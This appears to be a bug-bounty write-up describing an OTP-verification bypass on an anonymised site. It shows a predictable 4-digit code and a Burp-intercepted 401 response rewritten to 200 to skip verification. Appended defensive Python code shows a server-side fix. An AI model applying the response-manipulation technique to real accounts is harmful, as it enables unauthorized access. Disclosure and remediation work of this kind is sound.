OTP Bypass By Response Manipulation
Want to earn 3-digit $$$? (15 min read)
Greetings everyone! I am Shuttlertech, Senior Cybersecurity Analyst, YouTuber, Freelancer, Cybersecurity Trainer & Bug Hunter.
Without wasting time, let's start.
This one is about a private program. I used some Responsible Disclosure Google dorks to pick a target. After deciding, I simply started recon on my target, www.xyz.com (I can't disclose the real name due to confidentiality).
Now, I simply tried to create an account on www.xyz.com. I filled in the registration form with random details, and after registration it asked for OTP verification.
OBSERVATION PART:
Now, I got the OTP on my email; it is a 4-digit number. Actually, the OTP was vulnerable: it looked like "0123", and only the "23" part changed when I requested an OTP again and again. I found that the OTP was vulnerable to brute forcing.
ATTACKING PART:
Now we need to enter the OTP for verification. I randomly entered 0000. Before clicking next I had already set up Burp as the proxy, so I clicked next and captured the request.
The captured request:
POST /v1/email?change=false&code=0000 HTTP/1.1
Host: xyz.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Now, simply forward it with Burp's "Response to this request" intercept option enabled.
The response we get in Burp Suite:
HTTP/1.1 401 Unauthorized
Content-Security-Policy: frame-ancestors 'none'
Content-Type: application/json; charset=utf-8
Content-Length: 42
Date: Fri, 22 May 2020 19:20:04 GMT
{"err":"Incorrect code","ECODE":"USR_014"}
As shown above, I got 401 Unauthorized. No worries, it's a start, and it gives us a chance to think about it; as I always say, the cybersecurity field is all about research.
Now, bypass it using response manipulation: simply change the response as shown below.
HTTP/1.1 200 OK
Content-Security-Policy: frame-ancestors 'none'
Content-Type: application/json; charset=utf-8
Content-Length: 42
Date: Fri, 22 May 2020 19:20:04 GMT
{}
BOOM! Now I was logged in without any verification, as I had bypassed the OTP (one-time password).
Do subscribe to me for live POCs: https://www.youtube.com/channel/UCS7EGEUlV6Sr7VUnzhBBZrg
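The bypass above works because the client decides "logged in" from the status code it sees, while the server never records that the OTP was actually checked. As an added example (not the author's code or the target program's), here is the server-side shape that closes both findings from the post: the verified state lives on the server, the code is drawn with full 4-digit entropy instead of a near-constant "01xx", attempts are capped, and the comparison is constant-time. The in-memory store and user ids are constructed for illustration.

```python
import hmac
import secrets
import time

OTP_TTL_SECONDS = 300   # code lifetime
MAX_ATTEMPTS = 5        # wrong guesses allowed per issued code


class OtpStore:
    """Server-side OTP state keyed by user id (constructed in-memory store, for illustration)."""

    def __init__(self):
        self._pending = {}      # user_id -> {"code", "expires", "attempts"}
        self._verified = set()  # users whose current session passed OTP

    def issue(self, user_id, now=None):
        # Draw all four digits from the CSPRNG; a "01xx" pattern leaves only 100 candidates.
        code = f"{secrets.randbelow(10_000):04d}"
        now = time.time() if now is None else now
        self._pending[user_id] = {"code": code, "expires": now + OTP_TTL_SECONDS, "attempts": 0}
        return code  # delivered out of band (e-mail); never sent back to the browser

    def verify(self, user_id, submitted, now=None):
        """Return (status, body) like the endpoint in the post; state changes only here."""
        now = time.time() if now is None else now
        entry = self._pending.get(user_id)
        if entry is None:
            return 401, {"err": "No pending code"}
        if now > entry["expires"] or entry["attempts"] >= MAX_ATTEMPTS:
            del self._pending[user_id]  # burn the code; the user must request a new one
            return 401, {"err": "Code expired or locked"}
        entry["attempts"] += 1
        # Constant-time compare; reject non-ASCII input before compare_digest raises on it.
        ok = (isinstance(submitted, str) and submitted.isascii()
              and hmac.compare_digest(entry["code"], submitted))
        if not ok:
            return 401, {"err": "Incorrect code"}
        del self._pending[user_id]
        self._verified.add(user_id)
        return 200, {}

    def is_verified(self, user_id):
        # Every post-OTP endpoint asks the server, so a 401 rewritten to 200 in a proxy changes nothing.
        return user_id in self._verified
```

Any endpoint reached after the OTP step should gate on `is_verified()` rather than on anything the browser sends.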